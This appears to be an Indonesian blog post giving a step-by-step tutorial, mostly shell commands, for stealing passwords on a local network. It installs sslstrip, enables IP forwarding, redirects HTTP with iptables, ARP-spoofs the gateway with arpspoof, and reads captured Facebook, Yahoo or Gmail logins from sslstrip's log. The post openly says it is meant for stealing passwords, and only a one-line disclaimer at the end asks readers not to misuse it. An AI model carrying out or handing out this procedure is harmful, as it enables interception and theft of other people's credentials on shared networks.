Pertama-tama
siapkan tool yang akan kita gunakan
- Arpspoof
- Sslstrip-0.9
Setelah
semua tool yang di butuhkan sudah tersedia lakukan langkah berikut
(jika paket belum terinstal) :
1) Buka
Terminal kemudian ketikkan : wget
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
2) Kemudian
extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz
3) Ok
sekarang kita masuk ke dalam folder baru dari file yang telah kita
extract tadi : cd sslstrip-0.9
4) Dan
untuk menginstal ketikkan : python setup.py install
Lakukan
langkah berikut ( Jika paket sudah terinstall )
Gunakan
cara ini setiap kali jika ingin mencuri password lagi
1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward
2) Kemudian
cari gateway atau pintu dari jaringan yang akan kita sadap dengan
cara : netstat -nr
3) sekarang
kita reset port http ke port 8080, ketikan : iptables -t
nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
8080
4) Mulai
menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 (
192.168.0.1 adalah gateway dari jaringan yang saya gunakan,
gantilah gateway tersebut dengan gateway yang anda temukan dari
netstat -nr tadi)
5) Kemudian
buka terminal baru lalu ketikkan : sslstrip -l
8080 untuk mengaktifkan cookies yang akan kita baca
6) Set
up is complete!! Ok sekarang kita telah menyadap akses
jaringan yang melewati gateway.
7) jika
anda ingin melihat akses kemana sajakah itu gunakan perintah : tail
-f sslstrip.log
8) dan
saat ada seseorang melakuakn login entah facebook yahoo gmail atau
apapun yang menggunakan username dan password WALAAA kita akan
mengetahuinya.
karena
akan memakan waktu yang cukup lama karena harus menunggu ada
seseorang yang mlakukan login jadi kita harus bersabar. dan itupun
akan muncul script yang cukup banyak. gunakan perintah find "pass:
tanpa petik agar kita lebih mudah menemukannya
HANYA
UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN
0 komentar:
Posting Komentar